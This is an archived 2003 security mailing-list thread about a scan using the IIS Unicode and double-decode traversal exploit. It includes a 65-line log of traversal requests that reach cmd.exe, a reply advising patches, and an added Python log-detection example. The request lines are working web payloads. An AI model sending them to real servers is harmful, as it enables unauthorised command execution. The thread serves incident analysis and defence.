Security Incidents mailing list archives

Re: New attack or old Vulnerability Scanner?


From: jac <johann.coulon () sulzer com>
Date: 29 Apr 2003 20:21:49 -0000

In-Reply-To: <20030424234343.8177.qmail () www securityfocus com>

Hi Mark,

The pattern is the UNICODE Exploit. Depending on the HTTP Response 200 
(Success) or 404 (Not Found) you may be affected by this exploit when 
running an unpatched Version of IIS 4.0/5.0. Have a closer look at your 
Webserver Logfiles. If you don't see the HTTP Response you may prefer to 
configure the logfile output with extended logging options for future 
analysis.

You can take good prevention from this and several other attacks by 
applying all security patches, using Microsoft's URLScan and doing some 
hardening on your internet server(s).

Johann Coulon
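One way to act on Johann's advice (read the web server logs and let the status code decide): an added example, not code from either poster, that canonicalizes request paths the way an unpatched IIS did (double percent-decoding plus the overlong UTF-8 separators seen in the quoted scan), flags probes for cmd.exe, root.exe and shell.exe, and treats a 200 on such a probe as a likely compromise. The W3C extended log sample, its field layout and the verdict names are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 spellings of '/' and '\' that unpatched IIS 4/5 took as separators.
OVERLONG = {b"\xc0\xaf": b"/", b"\xe0\x80\xaf": b"/", b"\xf0\x80\x80\xaf": b"/",
            b"\xf8\x80\x80\x80\xaf": b"/", b"\xfc\x80\x80\x80\x80\xaf": b"/",
            b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}
# Probe targets: cmd.exe by traversal, or the root.exe/shell.exe copies worms left.
TARGET = re.compile(r"(winnt/system32/cmd\.exe|/(root|shell)\.exe)$")

def canonicalize(uri_stem):
    """Decode as the vulnerable server did: percent-decode twice (the
    double-decode bug: %255c -> %5c -> '\\'), then fold overlong UTF-8."""
    data = unquote_to_bytes(unquote_to_bytes(uri_stem))
    for seq, sep in OVERLONG.items():
        data = data.replace(seq, sep)
    return data.decode("latin-1").replace("\\", "/").lower()

def classify(uri_stem, status):
    """None for an ordinary request; otherwise a verdict for the probe."""
    path = canonicalize(uri_stem)
    if "/../" not in path and not TARGET.search(path):
        return None
    if status is None:
        return "UNKNOWN"   # sc-status not logged, so success cannot be judged
    return "EXPLOITED" if status == 200 else "ATTEMPT"

def scan_log(text):
    """Walk IIS W3C extended log lines; return (client ip, verdict, stem)."""
    fields, findings = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rec = dict(zip(fields, line.split()))
            status = rec.get("sc-status")
            verdict = classify(rec["cs-uri-stem"], int(status) if status else None)
            if verdict:
                findings.append((rec["c-ip"], verdict, rec["cs-uri-stem"]))
    return findings

# Constructed sample log in W3C extended format (not from the original post).
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-04-24 23:10:01 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c: 200
2003-04-24 23:10:02 192.0.2.10 GET /msadc/..%255c../..%255c../winnt/system32/cmd.exe /c+dir+c: 404
2003-04-24 23:10:03 192.0.2.10 GET /scripts/root.exe /c+dir+c: 404
2003-04-24 23:10:04 198.51.100.7 GET /index.html - 200
"""
```

A log without the sc-status field yields UNKNOWN for every probe, which is exactly the case Johann's remark about enabling extended logging covers.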


Date: 24 Apr 2003 23:43:43 -0000
Message-ID: <20030424234343.8177.qmail () www securityfocus com>
From: Mark Embrich <mark_embrich () yahoo com>
To: incidents () securityfocus com
Subject: New attack or old Vulnerability Scanner?



Hello,

Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
Note that it also included: "User-Agent:.Mozilla/3.0.(compatible;.Indy.Library)...."
My googling tells me that this attack/scanner is probably built using the
Borland Delphi/C++ Builder suite.

I've so far received 3 of these from 2 different IP addresses.
The first two were from a Comcast cable user.
The last was from a Cox Communications IP.

Thanks,
Mark Embrich

0.     Scan TCP 80
1.     GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2.     GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3.     GET./_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4.     GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5.     GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6.     GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7.     GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8.     GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9.     GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10.    GET./_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11.    GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12.    GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13.    GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14.    GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15.    GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16.    GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17.    GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18.    GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19.    GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
20.    GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21.    GET./msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22.    GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23.    GET./msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24.    GET./MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25.    GET./msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26.    GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27.    GET./msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28.    GET./msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29.    GET./msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30.    GET./msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31.    GET./msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32.    GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33.    GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34.    GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35.    GET./PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36.    GET./PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37.    GET./PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38.    GET./PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39.    GET./Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40.    GET./Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
41.    GET./Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42.    GET./Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43.    GET./samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44.    GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45.    GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46.    GET./scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47.    GET./scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48.    GET./scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49.    GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50.    GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51.    GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52.    GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53.    GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54.    GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55.    GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56.    GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57.    GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58.    GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59.    GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60.    GET./scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61.    GET./scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62.    GET./scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63.    GET./scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64.    GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
65.    GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..

----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hands-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
----------------------------------------------------------------------------